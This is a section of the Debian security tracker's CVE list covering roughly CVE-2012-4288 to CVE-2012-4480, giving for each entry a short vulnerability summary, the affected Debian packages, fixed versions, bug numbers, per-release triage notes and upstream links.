CVE-2012-4480
	RESERVED
	NOT-FOR-US: mom
CVE-2012-4479 (SQL injection vulnerability in the Drag & Drop Gallery module 6.x for ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4478 (Cross-site request forgery (CSRF) vulnerability in the Drag & Drop ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4477 (Unspecified vulnerability in the Drag & Drop Gallery module 6.x for ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4476 (Cross-site scripting (XSS) vulnerability in the Drag & Drop Gallery ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4475 (The Security Questions module for Drupal 6.x-1.x before 6.x-1.1 and ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4474 (Multiple cross-site scripting (XSS) vulnerabilities in the Colorbox ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4473 (The Restrict node page view module 7.x-1.x before 7.x-1.2 for Drupal ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4472 (Unrestricted file upload vulnerability in upload.php in the Drag & ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4471 (The Search Autocomplete module 7.x-2.x before 7.x-2.4 for Drupal does ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4470 (The Listhandler module 6.x-1.x before 6.x-1.1 for Drupal does not ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4469 (Cross-site scripting (XSS) vulnerability in the Hashcash module ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4468 (Cross-site scripting (XSS) vulnerability in the Privatemsg module ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-4467 (The (1) do_siocgstamp and (2) do_siocgstampns functions in ...)
	- linux-2.6 (Vulnerable code introduced in 3.3)
	- linux (Vulnerable code introduced in 3.3)
CVE-2012-4466 (Ruby 1.8.7 before patchlevel 371, 1.9.3 before patchlevel 286, and 2.0 ...)
	- ruby1.9.1 1.9.3.194-2 (low; bug #689075)
	[squeeze] - ruby1.9.1 (Minor issue)
CVE-2012-4465 (Heap-based buffer overflow in the substr function in parsing.c in cgit ...)
	- cgit (bug #515793)
CVE-2012-4464 (Ruby 1.9.3 before patchlevel 286 and 2.0 before revision r37068 allows ...)
	- ruby1.9.1 1.9.3.194-2 (low; bug #689075)
	[squeeze] - ruby1.9.1 (Introduced in 1.9.3)
CVE-2012-4463 (Midnight Commander (mc) 4.8.5 does not properly handle the (1) ...)
	- mc (low; bug #689571)
	[wheezy] - mc (Minor issue)
	[squeeze] - mc (Minor issue)
CVE-2012-4462 (aviary/jobcontrol.py in Condor, as used in Red Hat Enterprise MRG 2.3, ...)
	- condor (This bug only affects the Aviary contrib module, which isn't built in the Debian condor package, #690556)
CVE-2012-4461 (The KVM subsystem in the Linux kernel before 3.6.9, when running on ...)
	{DSA-2668-1}
	- linux-2.6
	- linux 3.2.35-1
CVE-2012-4460 (The serializing/deserializing functions in the qpid::framing::Buffer ...)
	- qpid-cpp
CVE-2012-4459 (Integer overflow in the qpid::framing::Buffer::checkAvailable function ...)
	- qpid-cpp
CVE-2012-4458 (The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote ...)
	- qpid-cpp
CVE-2012-4457 (OpenStack Keystone Essex before 2012.1.2 and Folsom before folsom-3 ...)
	- keystone 2012.1.1-9 (bug #689210)
CVE-2012-4456 (The (1) OS-KSADM/services and (2) tenant APIs in OpenStack Keystone ...)
	- keystone 2012.1.1-9 (bug #689210)
CVE-2012-4455 (openCryptoki 2.4.1 allows local users to create or set world-writable ...)
	- opencryptoki (low; bug #689417)
	[squeeze] - opencryptoki (Minor issue)
	[wheezy] - opencryptoki (Minor issue)
CVE-2012-4454 (openCryptoki before 2.4.1, when using spinlocks, allows local users to ...)
	- opencryptoki (low; bug #689417)
	[squeeze] - opencryptoki (Minor issue)
	[wheezy] - opencryptoki (Minor issue)
CVE-2012-4453 (dracut.sh in dracut, as used in Red Hat Enterprise Linux 6, Fedora 16 ...)
	- dracut 020-1.1 (low; bug #688956)
	[squeeze] - dracut (Minor issue)
CVE-2012-4452 (MySQL 5.0.88, and possibly other versions and platforms, allows local ...)
	- mysql-dfsg-5.0 (Debian never included that 5.0.88 release)
CVE-2012-4451 [php-ZendFramework: XSS vectors in multiple Zend Framework components ZF2012-03]
	RESERVED
	- zendframework (Vulnerable code introduced in 2.x, #688946)
CVE-2012-4450 (389 Directory Server 1.2.10 does not properly update the ACL when a DN ...)
	- 389-ds-base 1.2.11.15-1 (bug #688942)
	NOTE: Upstream ticket https://fedorahosted.org/389/ticket/340
	NOTE: Upstream patch http://git.fedorahosted.org/cgit/389/ds.git/commit/?id=5beb93d42efb807838c09c5fab898876876f8d09
CVE-2012-4449 RESERVED
CVE-2012-4448 (Cross-site request forgery (CSRF) vulnerability in wp-admin/index.php ...)
	- wordpress 3.5.1+dfsg-2 (low; bug #689031)
	[squeeze] - wordpress (Minor issue)
	[wheezy] - wordpress (Minor issue)
CVE-2012-4447 (Heap-based buffer overflow in tif_pixarlog.c in LibTIFF before 4.0.3 ...)
	{DSA-2561-1}
	- tiff 4.0.2-4 (bug #688944)
	- tiff3 3.9.6-9 (bug #688944)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=860198
CVE-2012-4446 (The default configuration for Apache Qpid 0.20 and earlier, when the ...)
	- qpid-cpp
CVE-2012-4445 (Heap-based buffer overflow in the eap_server_tls_process_fragment ...)
	{DSA-2557-1}
	- hostapd
	- wpa 1.0-3 (bug #689990)
CVE-2012-4444 (The ip6_frag_queue function in net/ipv6/reassembly.c in the Linux ...)
	- linux 2.6.36-1~experimental.1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
CVE-2012-4443 (Monkey HTTP Daemon 0.9.3 uses a real UID of root and a real GID of ...)
	- monkey (unimportant; bug #688008)
CVE-2012-4442 (Monkey HTTP Daemon 0.9.3 retains the supplementary group IDs of the ...)
	- monkey (unimportant; bug #688007)
	NOTE: CVE-request http://www.openwall.com/lists/oss-security/2012/09/20/7
CVE-2012-4441 [jenkins XSS in CI game plugin]
	RESERVED
	- jenkins (Plugin not built in Debian source package)
	NOTE: http://www.cloudbees.com/jenkins-advisory/jenkins-security-advisory-2012-09-17.cb
CVE-2012-4440 [jenkins XSS in Violations plugin]
	RESERVED
	- jenkins (Plugin not built in Debian source package)
	NOTE: http://www.cloudbees.com/jenkins-advisory/jenkins-security-advisory-2012-09-17.cb
CVE-2012-4439 [jenkins XSS]
	RESERVED
	- jenkins 1.447.2+dfsg-2 (bug #688298)
	NOTE: http://www.cloudbees.com/jenkins-advisory/jenkins-security-advisory-2012-09-17.cb
CVE-2012-4438 [jenkins remote code execution]
	RESERVED
	- jenkins 1.447.2+dfsg-2 (bug #688298)
	NOTE: http://www.cloudbees.com/jenkins-advisory/jenkins-security-advisory-2012-09-17.cb
CVE-2012-4437 (Cross-site scripting (XSS) vulnerability in the SmartyException class ...)
	- smarty3 3.1.10-2 (bug #688153)
	- smarty (bug #702710)
	[squeeze] - smarty (Will be fixed in point update)
	NOTE: http://www.openwall.com/lists/oss-security/2012/09/19/1
	NOTE: http://secunia.com/advisories/50589/
	NOTE: http://code.google.com/p/smarty-php/source/browse/trunk/distribution/change_log.txt
	NOTE: http://code.google.com/p/smarty-php/source/detail?r=4658
	NOTE: https://code.google.com/p/smarty-php/source/detail?r=4660
CVE-2012-4436 (Buffer overflow in the run_last_args function in client/fwknop.c in ...)
	- fwknop 2.0.3-1 (bug #688151)
	[squeeze] - fwknop (Vulnerable code not present)
	[wheezy] - fwknop 2.0.0rc2-2+deb7u1
	NOTE: http://seclists.org/oss-sec/2012/q3/509
	NOTE: http://www.cipherdyne.org/cgi-bin/gitweb.cgi?p=fwknop.git;a=commitdiff;h=a60f05ad44e824f6230b22f8976399340cb535dc
CVE-2012-4435 (fwknop before 2.0.3 does not properly validate IP addresses, which ...)
	- fwknop 2.0.3-1 (bug #688151)
	[squeeze] - fwknop (Vulnerable code not present)
	[wheezy] - fwknop 2.0.0rc2-2+deb7u1
	NOTE: http://seclists.org/oss-sec/2012/q3/509
	NOTE: http://www.cipherdyne.org/cgi-bin/gitweb.cgi?p=fwknop.git;a=commitdiff;h=f4c16bc47fc24a96b63105556b62d61c1ba7d799
CVE-2012-4434 [fwknop 2.0.3: multiple DoS / code execution flaw]
	RESERVED
	- fwknop 2.0.3-1 (bug #688151)
	[squeeze] - fwknop (Vulnerable code not present)
	[wheezy] - fwknop 2.0.0rc2-2+deb7u1
	NOTE: http://seclists.org/oss-sec/2012/q3/509
	NOTE: http://www.cipherdyne.org/cgi-bin/gitweb.cgi?p=fwknop.git;a=commitdiff;h=d46ba1c027a11e45821ba897a4928819bccc8f22
CVE-2012-4433 (Multiple integer overflows in operations/external/ppm-load.c in GEGL ...)
	- gegl 0.2.0-2+nmu1 (bug #692435)
	[squeeze] - gegl (PPM code not yet present)
	NOTE: http://seclists.org/oss-sec/2012/q4/215
CVE-2012-4432 (Use-after-free vulnerability in opngreduc.c in OptiPNG Hg and 0.7.x ...)
	- optipng (Introduced in 0.7, bug #687998)
CVE-2012-4431 (org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat ...)
	- tomcat7 7.0.28-4 (bug #695251)
	- tomcat6 6.0.35-6 (bug #695250)
CVE-2012-4430 (The dump_resource function in dird/dird_conf.c in Bacula before 5.2.11 ...)
	{DSA-2558-1}
	- bacula 5.2.6+dfsg-4 (bug #687923)
	[wheezy] - bacula 5.2.6+dfsg-2.1
	NOTE: http://www.bacula.org/git/cgit.cgi/bacula/commit/?id=67debcecd3d530c429e817e1d778e79dcd1db905
CVE-2012-4429 (Vino 2.28, 2.32, 3.4.2, and earlier allows remote attackers to read ...)
	- vino (bug #687596; low)
	[squeeze] - vino (Minor issue)
	[wheezy] - vino (Minor issue)
CVE-2012-4428 RESERVED
	- openslp-dfsg (bug #687597; low)
	[squeeze] - openslp-dfsg (Minor issue)
	[wheezy] - openslp-dfsg (Minor issue)
	NOTE: no upstream solution as of 11/17/2012
CVE-2012-4427 (The gnome-shell plugin 3.4.1 in GNOME allows remote attackers to force ...)
	- gnome-shell (unimportant)
	NOTE: I don't see much of a problem here, if you install from a repo, you need to trust it
	NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=684215
	NOTE: As far as I can see there is still a yes/no prompt for the user. I suggest unfixed unimportant. -- helmut
CVE-2012-4426 (Multiple format string vulnerabilities in mcrypt 2.6.8 and earlier ...)
	- mcrypt 2.6.8-1.1
	[squeeze] - mcrypt (minor issue, it doesn't affect libmcrypt)
CVE-2012-4425 (libgio, when used in setuid or other privileged programs in spice-gtk ...)
	- spice-gtk 0.12-5 (bug #689155)
	NOTE: http://www.openwall.com/lists/oss-security/2012/09/13/18
CVE-2012-4424 [alloca buffer overflow via strcoll]
	RESERVED
	- eglibc (low; bug #689423)
	[wheezy] - eglibc (Minor issue)
	[squeeze] - eglibc (Minor issue)
CVE-2012-4423 (The virNetServerProgramDispatchCall function in libvirt before 0.10.2 ...)
	- libvirt 0.9.12-5 (bug #687598)
	[squeeze] - libvirt (Vulnerable code not present)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=857133
	NOTE: http://www.openwall.com/lists/oss-security/2012/09/13/11
CVE-2012-4422 (wp-admin/plugins.php in WordPress before 3.4.2, when the multisite ...)
	- wordpress 3.4.2+dfsg-1
CVE-2012-4421 (The create_post function in wp-includes/class-wp-atom-server.php in ...)
	- wordpress 3.4.2+dfsg-1
CVE-2012-4420 [Duplicate of CVE-2012-4416]
	RESERVED
	NOT-FOR-US: Duplicate of CVE-2012-4416
CVE-2012-4419 (The compare_tor_addr_to_addr_policy function in or/policies.c in Tor ...)
	{DSA-2548-1}
	- tor 0.2.3.22-rc-1
	NOTE: http://www.openwall.com/lists/oss-security/2012/09/12/5
	NOTE: https://gitweb.torproject.org/tor.git/blob/release-0.2.2:/ReleaseNotes
	NOTE: https://gitweb.torproject.org/tor.git/commitdiff/973c18bf0e84d14d8006a9ae97fde7f7fb97e404
	NOTE: https://gitweb.torproject.org/tor.git/commitdiff/62d96284f7e0f81c40d5df7e53dd7b4dfe7e56a5
CVE-2012-4418 (Apache Axis2 allows remote attackers to forge messages and bypass ...)
	NOT-FOR-US: We only provide Axis 1(Java) and the C-version of Axis
CVE-2012-4417 (GlusterFS 3.3.0, as used in Red Hat Storage server 2.0, allows local ...)
	- glusterfs 3.2.7-5 (low; bug #693112)
	[wheezy] - glusterfs (Minor issue)
	[squeeze] - glusterfs (Minor issue)
CVE-2012-4416 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
CVE-2012-4415 (Stack-based buffer overflow in the guac_client_plugin_open function in ...)
	- libguac 0.6.0-2 (medium)
	NOTE: maintainer contacted us, working on update
	NOTE: http://guac-dev.org/trac/changeset/7dcefa744b4a38825619c00ae8b47e5bae6e38c0/libguac
CVE-2012-4414 (Multiple SQL injection vulnerabilities in the replication code in ...)
	- mysql-5.1 (bug #687484)
	- mysql-5.5 5.5.30+dfsg-1 (bug #687485)
CVE-2012-4413 (OpenStack Keystone 2012.1.3 does not invalidate existing tokens when ...)
	- keystone 2012.1.1-6 (bug #687428)
	NOTE: http://www.openwall.com/lists/oss-security/2012/09/12/7
CVE-2012-4412 [strcoll int->buffer overflow]
	RESERVED
	- eglibc (low; bug #687530)
	[wheezy] - eglibc (Minor issue)
	[squeeze] - eglibc (Minor issue)
CVE-2012-4411 (The graphical console in Xen 4.0, 4.1 and 4.2 allows local OS guest ...)
	{DSA-2543-1}
	- xen 4.1.3-2
	- xen-qemu-dm-4.0
	[squeeze] - xen (In Squeeze the code is in the package xen-qemu-dm-4.0)
CVE-2012-4409 (Stack-based buffer overflow in the check_file_head function in extra.c ...)
	- mcrypt 2.6.8-1.1
	[squeeze] - mcrypt (minor issue, it doesn't affect libmcrypt)
	NOTE: http://packetstormsecurity.org/files/116268/mcrypt-2.6.8-Buffer-Overflow-Proof-Of-Concept.html
CVE-2012-4408 (course/reset.php in Moodle 2.1.x before 2.1.8, 2.2.x before 2.2.5, and ...)
	- moodle 2.2.3.dfsg-2.3 (low; bug #687924)
	[squeeze] - moodle (Only affects >= 2.1)
CVE-2012-4407 (lib/filelib.php in Moodle 2.1.x before 2.1.8, 2.2.x before 2.2.5, and ...)
	- moodle 2.2.3.dfsg-2.3 (low; bug #687924)
	[squeeze] - moodle (Only affects >= 2.1)
CVE-2012-4406 (OpenStack Object Storage (swift) before 1.7.0 uses the loads function ...)
	- swift 1.4.8-2 (bug #686812)
CVE-2012-4405 (Multiple integer underflows in the icmLut_allocate function in ...)
	{DSA-2595-1}
	- argyll 1.4.0-7 (bug #687275)
	- ghostscript 9.05~dfsg-6.1 (bug #687274)
CVE-2012-4404 (security/__init__.py in MoinMoin 1.9 through 1.9.4 does not properly ...)
	{DSA-2538-1}
	- moin 1.9.4-8
	NOTE: http://hg.moinmo.in/moin/1.9/rev/7b9f39289e16
CVE-2012-4403 (theme/yui_combo.php in Moodle 2.3.x before 2.3.2 does not properly ...)
	- moodle (Only affects >= 2.3)
CVE-2012-4402 (webservice/lib.php in Moodle 2.1.x before 2.1.8, 2.2.x before 2.2.5, ...)
	- moodle 2.2.3.dfsg-2.3 (bug #687924)
	[squeeze] - moodle (Only affects >= 2.1)
CVE-2012-4401 (Moodle 2.2.x before 2.2.5 and 2.3.x before 2.3.2 allows remote ...)
	- moodle 2.2.3.dfsg-2.3 (low; bug #687924)
	[squeeze] - moodle (Only affects >= 2.2)
CVE-2012-4400 (repository/repository_ajax.php in Moodle 2.2.x before 2.2.5 and 2.3.x ...)
	- moodle 2.2.3.dfsg-2.3 (low; bug #687924)
	[squeeze] - moodle (Only affects >= 2.2)
CVE-2012-4399 (The Xml class in CakePHP 2.1.x before 2.1.5 and 2.2.x before 2.2.1 ...)
	- cakephp (Does not affect 1.3)
	NOTE: http://seclists.org/bugtraq/2012/Jul/101
	NOTE: http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1
CVE-2012-4398 (The __request_module function in kernel/kmod.c in the Linux kernel ...)
	- linux 3.2.35-1 (low)
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
CVE-2012-4397 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...)
	- owncloud 4.0.1debian-1
CVE-2012-4396 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...)
	- owncloud 4.0.2debian-1
CVE-2012-4395 (Cross-site scripting (XSS) vulnerability in index.php in ownCloud ...)
	- owncloud 4.0.3debian-1
CVE-2012-4394 (Cross-site scripting (XSS) vulnerability in apps/files/js/filelist.js ...)
	- owncloud 4.0.5debian-1 (bug #686567)
	[wheezy] - owncloud 4.0.4debian2-2
CVE-2012-4393 (Multiple cross-site request forgery (CSRF) vulnerabilities in ownCloud ...)
	- owncloud 4.0.7debian-1 (bug #686567)
	[wheezy] - owncloud 4.0.4debian2-2
CVE-2012-4392 (index.php in ownCloud 4.0.7 does not properly validate the oc_token ...)
	- owncloud 4.0.7debian-1 (bug #686567)
	[wheezy] - owncloud 4.0.4debian2-2
CVE-2012-4391 (Cross-site request forgery (CSRF) vulnerability in ...)
	- owncloud 4.0.7debian-1 (bug #686567)
	[wheezy] - owncloud 4.0.4debian2-2
CVE-2012-4390 ((1) apps/calendar/appinfo/remote.php and (2) ...)
	- owncloud 4.0.7debian-1 (bug #686567)
	[wheezy] - owncloud 4.0.4debian2-2
CVE-2012-4389 (Incomplete blacklist vulnerability in lib/migrate.php in ownCloud ...)
	- owncloud 4.0.7debian-1 (bug #686567)
	[wheezy] - owncloud 4.0.4debian2-2
CVE-2012-4388 (The sapi_header_op function in main/SAPI.c in PHP 5.4.0RC2 through ...)
	- php5 5.4.1~rc1-1
	[squeeze] - php5 (CVE-2011-1398 was never fixed in squeeze)
CVE-2012-4387 (Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a ...)
	- libstruts1.2-java (Only affects Struts 2)
	NOTE: http://struts.apache.org/2.x/docs/s2-011.html
CVE-2012-4386 (The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does ...)
	- libstruts1.2-java (Only affects Struts 2)
	NOTE: http://struts.apache.org/2.x/docs/s2-010.html
CVE-2012-4385 [letodms CSRF]
	RESERVED
	- letodms 3.3.7+dfsg-1 (bug #689664)
CVE-2012-4384 [letodms XSS]
	RESERVED
	- letodms 3.3.7+dfsg-1 (bug #689664)
CVE-2012-4383 RESERVED
	NOT-FOR-US: Contao
CVE-2012-4382 [Info leak in user blocks]
	RESERVED
	- mediawiki 1:1.19.2-1 (bug #686330)
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39823
	NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6
CVE-2012-4381 [Passwords were stored in local DB even if auth systems like LDAP were used]
	RESERVED
	- mediawiki 1:1.19.2-1 (bug #686330)
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39184
	NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6
CVE-2012-4380 [Insufficient API for account creation block]
	RESERVED
	- mediawiki 1:1.19.2-1 (bug #686330)
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39824
	NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6
CVE-2012-4379 [CSRF]
	RESERVED
	- mediawiki 1:1.19.2-1 (bug #686330)
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39180
	NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6
CVE-2012-4378 [DOM-based XSS]
	RESERVED
	- mediawiki 1:1.19.2-1 (bug #686330)
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=37587
	NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6
CVE-2012-4377 [mediawiki stored XSS]
	RESERVED
	- mediawiki 1:1.19.2-1 (bug #686330)
	[squeeze] - mediawiki (Introduced in 1.16)
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39700
	NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6
CVE-2012-4376 RESERVED
CVE-2012-4375 RESERVED
CVE-2012-4374 RESERVED
CVE-2012-4373 RESERVED
CVE-2012-4372 RESERVED
CVE-2012-4371 RESERVED
CVE-2012-4370 RESERVED
CVE-2012-4369 RESERVED
CVE-2012-4368 RESERVED
CVE-2012-4367 RESERVED
CVE-2012-4366 (Belkin wireless routers Surf N150 Model F7D1301v1, N900 Model ...)
	NOT-FOR-US: Belkin wireless routers
CVE-2012-4365 RESERVED
CVE-2012-4364 RESERVED
CVE-2011-5101 (The Rumor technology in McAfee SaaS Endpoint Protection before 5.2.4 ...)
	NOT-FOR-US: McAfee
CVE-2011-5100 (The web interface in McAfee Firewall Reporter before 5.1.0.13 does not ...)
	NOT-FOR-US: McAfee
CVE-2010-5143 (McAfee VirusScan Enterprise before 8.8 allows local users to disable ...)
	NOT-FOR-US: McAfee
CVE-2009-5118 (Untrusted search path vulnerability in McAfee VirusScan Enterprise ...)
	NOT-FOR-US: McAfee
CVE-2009-5117 (The Web Post Protection feature in McAfee Host Data Loss Prevention ...)
	NOT-FOR-US: McAfee
CVE-2009-5116 (McAfee LinuxShield 1.5.1 and earlier does not properly implement ...)
	NOT-FOR-US: McAfee
CVE-2009-5115 (McAfee Common Management Agent (CMA) 3.5.5 through 3.5.5.588 and 3.6.0 ...)
	NOT-FOR-US: McAfee
CVE-2012-4363 (Multiple unspecified vulnerabilities in Adobe Reader through 10.1.4 ...)
	NOT-FOR-US: Adobe Reader
CVE-2012-4362 (hydra.exe in HP SAN/iQ before 9.5 on the HP Virtual SAN Appliance has ...)
	NOT-FOR-US: HP Virtual SAN Appliance
CVE-2012-4361 (lhn/public/network/ping in HP SAN/iQ before 9.5 on the HP Virtual SAN ...)
	NOT-FOR-US: HP Virtual SAN Appliance
CVE-2012-4360 (Cross-site scripting (XSS) vulnerability in the mod_pagespeed module ...)
	NOT-FOR-US: mod_pagespeed
CVE-2012-4359 (Sielco Sistemi Winlog Pro SCADA before 2.07.18 and Winlog Lite SCADA ...)
	NOT-FOR-US: Sielco Sistemi Winlog SCADA
CVE-2012-4358 (Sielco Sistemi Winlog Pro SCADA before 2.07.17 and Winlog Lite SCADA ...)
	NOT-FOR-US: Sielco Sistemi Winlog SCADA
CVE-2012-4357 (Array index error in Sielco Sistemi Winlog Pro SCADA before 2.07.17 ...)
	NOT-FOR-US: Sielco Sistemi Winlog SCADA
CVE-2012-4356 (Multiple directory traversal vulnerabilities in Sielco Sistemi Winlog ...)
	NOT-FOR-US: Sielco Sistemi Winlog SCADA
CVE-2012-4355 (TCPIPS_Story.dll in Sielco Sistemi Winlog Pro SCADA before 2.07.18 and ...)
	NOT-FOR-US: Sielco Sistemi Winlog SCADA
CVE-2012-4354 (TCPIPS_Story.dll in Sielco Sistemi Winlog Pro SCADA before 2.07.17 and ...)
	NOT-FOR-US: Sielco Sistemi Winlog SCADA
CVE-2012-4353 (Stack-based buffer overflow in RunTime.exe in Sielco Sistemi Winlog ...)
	NOT-FOR-US: Sielco Sistemi Winlog SCADA
CVE-2012-4352 (Multiple cross-site scripting (XSS) vulnerabilities in Stoneware ...)
	NOT-FOR-US: Stoneware webNetwork
CVE-2012-4351 (Integer overflow in pgpwded.sys in Symantec PGP Desktop 10.x and ...)
	NOT-FOR-US: Symantec
CVE-2012-4350 (Multiple unquoted Windows search path vulnerabilities in the (1) ...)
	NOT-FOR-US: Symantec Enterprise Security Manager
CVE-2012-4349 (Unquoted Windows search path vulnerability in Symantec Network Access ...)
	NOT-FOR-US: Symantec Network Access Control
CVE-2012-4348 (The management console in Symantec Endpoint Protection (SEP) 11.0 ...)
	NOT-FOR-US: Symantec Endpoint Protection
CVE-2012-4347 (Multiple directory traversal vulnerabilities in the management console ...)
	NOT-FOR-US: Symantec
CVE-2012-4346 RESERVED
CVE-2012-4345 (Multiple cross-site scripting (XSS) vulnerabilities in the Database ...)
	- phpmyadmin 4:3.4.11.1-1
	[squeeze] - phpmyadmin (Vulnerable code not present)
CVE-2012-4344 (Cross-site scripting (XSS) vulnerability in Ipswitch WhatsUp Gold ...)
	NOT-FOR-US: Ipswitch
CVE-2012-4343 (Multiple unspecified vulnerabilities in Gallery 3 before 3.0.4 allow ...)
	- gallery3 (bug #511715)
CVE-2012-4342 (Multiple cross-site scripting (XSS) vulnerabilities in Gallery 3 ...)
	- gallery3 (bug #511715)
CVE-2012-4341 (Multiple stack-based buffer overflows in msg_server.exe in SAP ...)
	NOT-FOR-US: SAP NetWeaver ABAP
CVE-2012-4340 (Cross-site scripting (XSS) vulnerability in Sybase EAServer before 6.1 ...)
	NOT-FOR-US: Sybase
CVE-2012-4339 RESERVED
CVE-2012-4338 RESERVED
CVE-2012-4337 (Foxit Reader before 5.3 on Windows XP and Windows 7 allows remote ...)
	NOT-FOR-US: Foxit Reader
CVE-2012-4336 (Multiple cross-site scripting (XSS) vulnerabilities in index.php in ...)
	NOT-FOR-US: Flogr 2.5.6
CVE-2012-4335 (Samsung NET-i viewer 1.37.120316 allows remote attackers to cause a ...)
	NOT-FOR-US: Samsung NET-i
CVE-2012-4334 (The ConnectDDNS method in the (1) STWConfigNVR 1.1.13.15 and (2) ...)
	NOT-FOR-US: Samsung NET-i
CVE-2012-4333 (Multiple stack-based buffer overflows in the BackupToAvi method in the ...)
	NOT-FOR-US: Samsung NET-i
CVE-2012-4332 (The ShareYourCart plugin 1.7.1 for WordPress allows remote attackers ...)
	NOT-FOR-US: Wordpress plugin
CVE-2012-4331 (Multiple unspecified vulnerabilities in SPIP before 1.9.2.o, 2.0.x ...)
	{DSA-2461-1}
	- spip 2.1.13-1
CVE-2012-4330 (The Samsung D6000 TV and possibly other products allows remote ...)
	NOT-FOR-US: Samsung D6000 TV
CVE-2012-4329 (The Samsung D6000 TV and possibly other products allow remote ...)
	NOT-FOR-US: Samsung D6000 TV
CVE-2012-4328 (Unspecified vulnerability in the MAPI in vBulletin Suite 4.1.2 through ...)
	NOT-FOR-US: vBulletin
CVE-2012-4327 (Unspecified vulnerability in the Image News slider plugin before 3.3 ...)
	NOT-FOR-US: Image News slider plugin for WordPress
CVE-2012-4326 (Cross-site request forgery (CSRF) vulnerability in commonsettings.php ...)
	NOT-FOR-US: AlstraSoft Site Uptime Enterprise
CVE-2012-4325 (Cross-site request forgery (CSRF) vulnerability in upload/users.php in ...)
	NOT-FOR-US: Utopia News Pro
CVE-2012-4324 (Cross-site request forgery (CSRF) vulnerability in PHPJabbers Vacation ...)
	NOT-FOR-US: PHPJabbers Vacation Rental Script
CVE-2012-4323 RESERVED
CVE-2012-4322 RESERVED
CVE-2012-4321 RESERVED
CVE-2012-4320 RESERVED
CVE-2012-4319 RESERVED
CVE-2012-4318 RESERVED
CVE-2012-4317 RESERVED
CVE-2012-4316 RESERVED
CVE-2012-4315 RESERVED
CVE-2012-4314 RESERVED
CVE-2012-4313 RESERVED
CVE-2012-4312 RESERVED
CVE-2012-4311 RESERVED
CVE-2012-4310 RESERVED
CVE-2012-4309 RESERVED
CVE-2012-4308 RESERVED
CVE-2012-4307 RESERVED
CVE-2012-4306 RESERVED
CVE-2012-4305 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2012-4304 RESERVED
CVE-2012-4303 (Unspecified vulnerability in the Oracle WebCenter Content component in ...)
	NOT-FOR-US: Oracle Fusion
CVE-2012-4302 RESERVED
CVE-2012-4301 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2012-4300 RESERVED
CVE-2012-4299 RESERVED
CVE-2012-4298 (Integer signedness error in the vwr_read_rec_data_ethernet function in ...)
	- wireshark 1.8.2-1
	[squeeze] - wireshark (Only affects 1.8.x)
CVE-2012-4297 (Buffer overflow in the dissect_gsm_rlcmac_downlink function in ...)
	- wireshark 1.8.2-1
	[squeeze] - wireshark (Only affects 1.6.x and 1.8.x)
CVE-2012-4296 (Buffer overflow in epan/dissectors/packet-rtps2.c in the RTPS2 ...)
	{DSA-2590-1}
	- wireshark 1.8.2-1
CVE-2012-4295 (Array index error in the channelised_fill_sdh_g707_format function in ...)
	- wireshark 1.8.2-1
	[squeeze] - wireshark (Only affects 1.8.x)
CVE-2012-4294 (Buffer overflow in the channelised_fill_sdh_g707_format function in ...)
	- wireshark 1.8.2-1
	[squeeze] - wireshark (Only affects 1.8.x)
CVE-2012-4293 (plugins/ethercat/packet-ecatmb.c in the EtherCAT Mailbox dissector in ...)
	- wireshark 1.8.2-1 (unimportant)
	NOTE: not suitable for code injection
CVE-2012-4292 (The dissect_stun_message function in epan/dissectors/packet-stun.c in ...)
	- wireshark 1.8.2-1 (unimportant)
	NOTE: not suitable for code injection
CVE-2012-4291 (The CIP dissector in Wireshark 1.4.x before 1.4.15, 1.6.x before ...)
	- wireshark 1.8.2-1 (unimportant)
	NOTE: not suitable for code injection
CVE-2012-4290 (The CTDB dissector in Wireshark 1.4.x before 1.4.15, 1.6.x before ...)
	- wireshark 1.8.2-1 (unimportant)
	NOTE: not suitable for code injection
CVE-2012-4289 (epan/dissectors/packet-afp.c in the AFP dissector in Wireshark 1.4.x ...)
	- wireshark 1.8.2-1 (unimportant)
	NOTE: not suitable for code injection
CVE-2012-4288 (Integer overflow in the dissect_xtp_ecntl function in ...)
	- wireshark 1.8.2-1 (unimportant)
	NOTE: not suitable for code injection
